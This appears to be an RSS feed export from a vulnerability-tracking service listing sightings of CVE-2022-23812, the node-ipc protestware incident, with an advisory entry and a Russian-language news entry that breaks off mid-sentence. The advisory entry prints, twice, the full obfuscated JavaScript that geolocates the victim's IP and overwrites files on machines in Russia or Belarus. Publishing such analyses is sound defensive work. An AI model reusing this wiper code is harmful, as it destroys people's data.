https://vulnerability.circl.lu Contains only the most 10 recent sightings. http://www.rssboard.org/rss-specification python-feedgen en Mon, 04 May 2026 20:51:19 +0000 https://vulnerability.circl.lu/sighting/ec8110d6-2b8e-466a-b1fc-0725e8b1a941/export {"uuid": "ec8110d6-2b8e-466a-b1fc-0725e8b1a941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/39102", "content": "\u203c CVE-2022-23812 \u203c\n\nThis affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from \"path\"; import a from \"fs\"; import o from \"https\"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\", \"base64\"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(\"utf8\"), function (t) { t.on(\"data\", function (t) { const n = Buffer.from(\"Li8=\", \"base64\"); const o = Buffer.from(\"Li4v\", \"base64\"); const r = Buffer.from(\"Li4vLi4v\", \"base64\"); const f = Buffer.from(\"Lw==\", \"base64\"); const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\"); const e = Buffer.from(\"cnVzc2lh\", \"base64\"); const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\"); try { const s = JSON.parse(t.toString(\"utf8\")); const u = s[c.toString(\"utf8\")].toLowerCase(); const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\")); // checks if country is Russia or Belarus if (a) { h(n.toString(\"utf8\")); h(o.toString(\"utf8\")); h(r.toString(\"utf8\")); h(f.toString(\"utf8\")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = \"\", o = \"\") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(\"4p2k77iP\", \"base64\"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(\"utf8\"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-03-16T19:20:34.000000Z"} {"uuid": "ec8110d6-2b8e-466a-b1fc-0725e8b1a941", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "published-proof-of-concept", "source": "https://t.me/cibsecurity/39102", "content": "\u203c CVE-2022-23812 \u203c\n\nThis affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, node-ipc imports the peacenotwar package that includes potentially undesired behavior. Malicious Code: **Note:** Don't run it! js import u from \"path\"; import a from \"fs\"; import o from \"https\"; setTimeout(function () { const t = Math.round(Math.random() * 4); if (t > 1) { return; } const n = Buffer.from(\"aHR0cHM6Ly9hcGkuaXBnZW9sb2NhdGlvbi5pby9pcGdlbz9hcGlLZXk9YWU1MTFlMTYyNzgyNGE5NjhhYWFhNzU4YTUzMDkxNTQ=\", \"base64\"); // https://api.ipgeolocation.io/ipgeo?apiKey=ae511e1627824a968aaaa758a5309154 o.get(n.toString(\"utf8\"), function (t) { t.on(\"data\", function (t) { const n = Buffer.from(\"Li8=\", \"base64\"); const o = Buffer.from(\"Li4v\", \"base64\"); const r = Buffer.from(\"Li4vLi4v\", \"base64\"); const f = Buffer.from(\"Lw==\", \"base64\"); const c = Buffer.from(\"Y291bnRyeV9uYW1l\", \"base64\"); const e = Buffer.from(\"cnVzc2lh\", \"base64\"); const i = Buffer.from(\"YmVsYXJ1cw==\", \"base64\"); try { const s = JSON.parse(t.toString(\"utf8\")); const u = s[c.toString(\"utf8\")].toLowerCase(); const a = u.includes(e.toString(\"utf8\")) || u.includes(i.toString(\"utf8\")); // checks if country is Russia or Belarus if (a) { h(n.toString(\"utf8\")); h(o.toString(\"utf8\")); h(r.toString(\"utf8\")); h(f.toString(\"utf8\")); } } catch (t) {} }); }); }, Math.ceil(Math.random() * 1e3)); async function h(n = \"\", o = \"\") { if (!a.existsSync(n)) { return; } let r = []; try { r = a.readdirSync(n); } catch (t) {} const f = []; const c = Buffer.from(\"4p2k77iP\", \"base64\"); for (var e = 0; e < r.length; e++) { const i = u.join(n, r[e]); let t = null; try { t = a.lstatSync(i); } catch (t) { continue; } if (t.isDirectory()) { const s = h(i, o); s.length > 0 ? f.push(...s) : null; } else if (i.indexOf(o) >= 0) { try { a.writeFile(i, c.toString(\"utf8\"), function () {}); // overwrites file with ?? } catch (t) {} } } return f; } const ssl = true; export { ssl as default, ssl };\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-03-16T19:20:34.000000Z"} https://vulnerability.circl.lu/sighting/ec8110d6-2b8e-466a-b1fc-0725e8b1a941/export Wed, 16 Mar 2022 19:20:34 +0000 https://vulnerability.circl.lu/sighting/4f6982f5-c4cf-4e07-be48-dc2edb47688f/export {"uuid": "4f6982f5-c4cf-4e07-be48-dc2edb47688f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "seen", "source": "https://t.me/true_secator/2746", "content": "\u0421\u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0430 \u0423\u043a\u0440\u0430\u0438\u043d\u0435 Protestware \u0432 \u0443\u043c\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 npm-\u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0432\u044b\u043b\u0438\u043b\u0441\u044f \u0432 \u0433\u0440\u043e\u043c\u043a\u0438\u0439 \u0441\u043a\u0430\u043d\u0434\u0430\u043b \u0432 \u043f\u0440\u043e\u0444\u0435\u0441\u0441\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435.\n\n8 \u043c\u0430\u0440\u0442\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e npm-\u043f\u0430\u043a\u0435\u0442\u0430 node-ipc \u0411\u0440\u044d\u043d\u0434\u043e\u043d \u041d\u043e\u0434\u0437\u0430\u043a\u0438 \u041c\u0438\u043b\u043b\u0435\u0440, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u043a\u0430\u043a\u00a0RIAEvangelist, \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u0430 npm \u0438 GitHub \u043f\u0430\u043a\u0435\u0442\u044b \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c\u00a0Peacenotwar\u00a0\u0438\u00a0oneday-test. \n\n\u0412\u043d\u043e\u0432\u044c \u0432\u044b\u0448\u0435\u0434\u0448\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 10.1.1 \u0438 10.1.2 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0438\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044c \u0432\u0441\u0435\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0435 \u0444\u0430\u0439\u043b\u044b WITH-LOVE-FROM-AMERICA.txt (\u0434\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439 \u0432\u0435\u0440\u0441\u0438\u0439 9.2.2, 11.0.0 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0447\u0435\u043c 11.0.0) \u0438 \u043f\u043e\u0441\u043b\u0430\u043d\u0438\u0435 \u00ab\u043c\u0438\u0440\u00bb \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u0441\u0442\u043e\u043b\u0435. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u0447\u0435\u0439 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 IP-\u0430\u0434\u0440\u0435\u0441 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u043b \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u043c\u0443 \u0438\u043b\u0438 \u0431\u0435\u043b\u043e\u0440\u0443\u0441\u0441\u043a\u043e\u043c\u0443 \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430\u043c. \u041f\u0430\u043a\u0435\u0442\u0430\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE-2022-23812.\n\n\u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e Node-ipc \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435\u00a0\u00a0\u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0440\u0430\u0437 \u0432 \u043d\u0435\u0434\u0435\u043b\u044e\u00a0\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0430\u0436\u043d\u044b\u043c \u043f\u0430\u043a\u0435\u0442\u043e\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u043c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430\u043c\u0438. \u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u043d\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Snyk, \u043f\u043e\u0434\u043e\u0431\u043d\u044b\u0439 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442 \u0438\u043c\u0435\u0435\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0439 \u0445\u0430\u0440\u0430\u043a\u0442\u0435\u0440 \u0434\u043b\u044f \u044d\u043a\u043e\u0441\u0438\u0441\u0442\u0435\u043c\u044b npm \u0438 \u0432\u044b\u0434\u0432\u0438\u0433\u0430\u0435\u0442 \u043d\u0430 \u043f\u0435\u0440\u0432\u044b\u0439 \u043f\u043b\u0430\u043d \u0431\u043e\u043b\u0435\u0435 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f: \u0442\u0440\u0430\u043d\u0437\u0438\u0442\u0438\u0432\u043d\u044b\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u0434\u0435 \u043c\u043e\u0433\u0443\u0442 \u0438\u043c\u0435\u0442\u044c \u043e\u0433\u0440\u043e\u043c\u043d\u043e\u0435 \u0432\u043b\u0438\u044f\u043d\u0438\u0435 \u043d\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u044c.\n\n\u0422\u0430\u043a, \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0439 \u0438\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441\u043d\u044b\u0439 \u0444\u0440\u0435\u0439\u043c\u0432\u043e\u0440\u043a JavaScript \u00abVue.js\u00bb \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 node-ipc \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0438, \u0438 \u0434\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 \u0431\u044b\u043b \u043d\u0430\u0441\u0442\u0440\u043e\u0435\u043d \u043d\u0430 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0438\u0445 \u0432\u0442\u043e\u0440\u043e\u0441\u0442\u0435\u043f\u0435\u043d\u043d\u044b\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 \u0438 \u0432\u0435\u0440\u0441\u0438\u0439 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439, \u0432 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0447\u0435\u0433\u043e \u043c\u043d\u043e\u0433\u0438\u0435 \u0435\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u0442\u0430\u043b\u0438 \u0436\u0435\u0440\u0442\u0432\u043e\u0439 Protestware. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c Vue.js \u2014 \u0434\u0430\u043b\u0435\u043a\u043e \u043d\u0435 \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0435\u043a\u0442 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u0432\u0435\u0440\u0441\u0438\u044f node-ipc.\n\nSnyk \u043e\u0442\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0432\u0435\u0440\u0441\u0438\u0438 node-ipc 10.1.1 \u0438 10.1.2 \u0431\u044b\u043b\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u044b npm \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 24 \u0447\u0430\u0441\u043e\u0432 \u043f\u043e\u0441\u043b\u0435 \u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u0438, \u043e\u0434\u043d\u0430\u043a\u043e 11.0.0 \u0438 \u0432\u044b\u0448\u0435\u00a0\u0432\u0441\u0435 \u0435\u0449\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b, \u0430 \u0437\u043d\u0430\u0447\u0438\u0442 \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u00a0Peacenotwar. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 node-ipc \u0443\u043b\u0438\u0447\u0438\u043b\u0438 \u0432 \u043f\u043e\u043f\u044b\u0442\u043a\u0435 \u00ab\u0437\u0430\u043c\u0435\u0441\u0442\u0438 \u0441\u043b\u0435\u0434\u044b\u00bb, \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u0443\u044f \u0438 \u0443\u0434\u0430\u043b\u044f\u044f\u00a0\u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043a\u043e\u043c\u043c\u0435\u043d\u0442\u0430\u0440\u0438\u0438\u00a0\u0432 \u0432\u0435\u0442\u043a\u0435.\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435 \u0441\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u0430\u044f\u00a0\u0430\u043a\u0446\u0438\u044f \u0441\u043e \u0441\u0442\u043e\u0440\u043e\u043d\u044b RIAEvangelist, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442, \u043a \u0441\u043b\u043e\u0432\u0443, \u0431\u043e\u043b\u0435\u0435 40 \u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0432 npm, \u0432\u044b\u0437\u0432\u0430\u043b\u0430 \u0440\u0435\u0437\u043a\u0443\u044e \u043a\u0440\u0438\u0442\u0438\u043a\u0443 \u0432 \u0441\u0440\u0435\u0434\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432 \u041f\u041e \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c, \u0441\u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u043e\u0432\u0430\u0432 \u043a\u0440\u0438\u0437\u0438\u0441 \u0434\u043e\u0432\u0435\u0440\u0438\u044f \u043a\u043e \u0432\u0441\u0435\u043c\u0443 \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0443\u043c. \n\n\u0412 \u043b\u044e\u0431\u043e\u043c \u0441\u043b\u0443\u0447\u0430\u0435 \u0441\u043b\u0435\u0434\u0443\u0435\u0442 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0442\u044c \u043f\u0440\u0438\u0432\u044f\u0437\u043a\u0438 \u0437\u0430\u0432\u0438\u0441\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0440\u0430\u0437\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u043c\u043e\u0433\u043e \u041f\u041e \u043a \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u043c \u0432\u0435\u0440\u0441\u0438\u044f\u043c: \u0441 \u0443\u0447\u0435\u0442\u043e\u043c \u043d\u0435\u0433\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0442\u0435\u043d\u0434\u0435\u043d\u0446\u0438\u0439, \u043f\u043e\u0436\u0430\u043b\u0443\u0439, \u044d\u0442\u043e \u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u0441\u044f \u0435\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c \u0441\u043f\u043e\u0441\u043e\u0431\u043e\u043c \u0437\u0430\u0449\u0438\u0442\u044b \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u043e\u0442 \u0442\u0430\u043a\u0438\u0445 \u0430\u0442\u0430\u043a \u0446\u0435\u043f\u043e\u0447\u043a\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a.", "creation_timestamp": "2022-03-18T09:40:00.000000Z"} {"uuid": "4f6982f5-c4cf-4e07-be48-dc2edb47688f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-23812", "type": "seen", "source": "https://t.me/true_secator/2746", "content": "\u0421\u043f\u0440\u043e\u0432\u043e\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u0435\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u043d\u0430 \u0423\u043a\u0440\u0430\u0438\u043d\u0435 Protestware \u0432 \u0443\u043c\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 npm-\u043f\u0430\u043a\u0435\u0442\u043e\u0432 \u0432\u044b\u043b\u0438\u043b\u0441\u044f \u0432 \u0433\u0440\u043e\u043c\u043a\u0438\u0439 \u0441\u043a\u0430\u043d\u0434\u0430\u043b \u0432 \u043f\u0440\u043e\u0444\u0435\u0441\u0441\u0438\u043e\u043d\u0430\u043b\u044c\u043d\u043e\u043c \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435.\n\n8 \u043c\u0430\u0440\u0442\u0430 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u043e\u0433\u043e npm-\u043f\u0430\u043a\u0435\u0442\u0430 node-ipc \u0411\u0440\u044d\u043d\u0434\u043e\u043d \u041d\u043e\u0434\u0437\u0430\u043a\u0438 \u041c\u0438\u043b\u043b\u0435\u0440, \u0442\u0430\u043a\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0439 \u043a\u0430\u043a\u00a0RIAEvangelist, \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b \u043d\u0430 npm \u0438 GitHub \u043f\u0430\u043a\u0435\u0442\u044b \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c\u00a0Peacenotwar\u00a0\u0438\u00a0oneday-test. \n\n\u0412\u043d\u043e\u0432\u044c \u0432\u044b\u0448\u0435\u0434\u0448\u0438\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 10.1.1 \u0438 10.1.2 \u0442\u0430\u043a\u0436\u0435 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u043a\u043e\u0434, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u044e\u0449\u0438\u0439 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044c \u0432\u0441\u0435\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u0442\u0435\u043a\u0441\u0442\u043e\u0432\u044b\u0435 \u0444\u0430\u0439\u043b\u044b WITH-LOVE-FROM-AMERICA.txt (\u0434\u043b\u044f \u0432\u0435\u0440\u0441\u0438\u0439 \u0432\u0435\u0440\u0441\u0438\u0439 9.2.2, 11.0.0 \u0438 \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0437\u0434\u043d\u0438\u0445, \u0447\u0435\u043c 11.0.0) \u0438 \u043f\u043e\u0441\u043b\u0430\u043d\u0438\u0435 \u00ab\u043c\u0438\u0440\u00bb \u043d\u0430 \u0440\u0430\u0431\u043e\u0447\u0435\u043c \u0441\u0442\u043e\u043b\u0435. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u043c\u0430\u043d\u0438\u043f\u0443\u043b\u044f\u0446\u0438\u0438 \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u043b\u0438\u0441\u044c \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u043e\u0432, \u0447\u0435\u0439 \u0432\u043d\u0435\u0448\u043d\u0438\u0439 IP-\u0430\u0434\u0440\u0435\u0441 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u043b \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u043e\u043c\u0443 \u0438\u043b\u0438 \u0431\u0435\u043b\u043e\u0440\u0443\u0441\u0441\u043a\u043e\u043c\u0443 \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0430\u043c. \u041f\u0430\u043a\u0435\u0442\u0430\u043c \u043f\u0440\u0438\u0441\u0432\u043e\u0435\u043d CVE-2022-23812.\n\n\u0412\u0441\u0435 \u0431\u044b \u043d\u0438\u0447\u0435\u0433\u043e, \u043d\u043e \u0442\u043e\u043b\u044c\u043a\u043e Node-ipc \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0431\u043e\u043b\u0435\u0435\u00a0\u00a0\u043c\u0438\u043b\u043b\u0438\u043e\u043d\u0430 \u0440\u0430\u0437 \u0432 \u043d\u0435\u0434\u0435\u043b\u044e\u00a0\u0438 \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u0430\u0436\u043d\u044b\u043c \u043f\u0430\u043a\u0435\u0442\u043e\u043c, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u043c \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c\u0438 \u0431\u0438\u0431\u043b\u0438\u043e\u0442\u0435\u043a\u0430\u043c\u0438. \u041f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u044e\u0449\u0438\u0445\u0441\u044f \u043d\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441 \u043e\u0442\u043a\u0440\u044b\u0442\u044b\u043c \u0438\u0441\u0445\u043e\u0434\u043d\u044b\u043c \u043a\u043e\u0434\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u0438\u0437 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Snyk, 